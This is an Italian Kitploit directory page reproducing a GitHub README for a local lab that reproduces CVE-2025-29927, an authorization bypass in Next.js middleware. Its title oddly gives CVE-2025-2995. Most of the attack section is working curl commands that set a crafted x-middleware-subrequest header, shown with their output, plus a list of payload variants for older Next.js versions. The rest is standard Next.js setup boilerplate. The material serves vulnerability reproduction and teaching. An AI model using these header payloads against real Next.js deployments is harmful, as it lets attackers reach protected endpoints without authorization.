Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2995 | Kitploit
Strumenti/GitHubGitHub/huynguyen12536/cve-2025-2995
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubhuynguyen12536/cve-2025-2995

CVE-2025-2995

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29927 Riproduzione del bypass di autorizzazione

Questo repository è una riproduzione della vulnerabilità CVE-2025-29927 nel pacchetto next

Come riprodurre

  1. Segui i passaggi seguenti per clonare ed eseguire l'applicazione Next.js
  2. Verifica che l'autorizzazione neghi l'accesso all'endpoint /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Verifica che l'autorizzazione funzioni quando viene fornito il token
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Ora può essere aggirata anche annidando middleware 5 volte nell'apposita intestazione x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Sfruttamento di CVE-2025-29927 nelle versioni precedenti di Next.js

Le versioni 12 e 13 di Next.js utilizzavano una convenzione di denominazione diversa per il file middleware (_middleware.js), cambiata poi in middleware.js in Next.js 14. Questa vulnerabilità può essere sfruttata nelle versioni precedenti utilizzando il file _middleware.js.

Ad esempio, si applicherebbero i seguenti payload, a seconda della versione di Next.js e della convenzione di routing:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (per le versioni 12.2 di Next.js con il file middleware.js nella root dell'app, non all'interno della directory pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (per le versioni di Next.js dalla 11 alla 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Per iniziare

Per prima cosa, esegui il server di sviluppo:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Apri http://localhost:3000 con il tuo browser per vedere il risultato.

Puoi iniziare a modificare la pagina intervenendo su app/page.js. La pagina si aggiorna automaticamente mentre modifichi il file.

Questo progetto utilizza next/font per ottimizzare e caricare automaticamente Geist, una nuova famiglia di font per Vercel.

Scopri di più

Per saperne di più su Next.js, dai un'occhiata alle seguenti risorse:

  • Documentazione di Next.js - scopri le funzionalità e le API di Next.js.
  • Impara Next.js - un tutorial interattivo su Next.js.

Puoi consultare il repository GitHub di Next.js - i tuoi feedback e contributi sono i benvenuti!

Deploy su Vercel

Il modo più semplice per eseguire il deploy della tua app Next.js è utilizzare la Piattaforma Vercel dei creatori di Next.js.

Consulta la nostra documentazione sul deploy di Next.js per maggiori dettagli.

Scarica lo strumento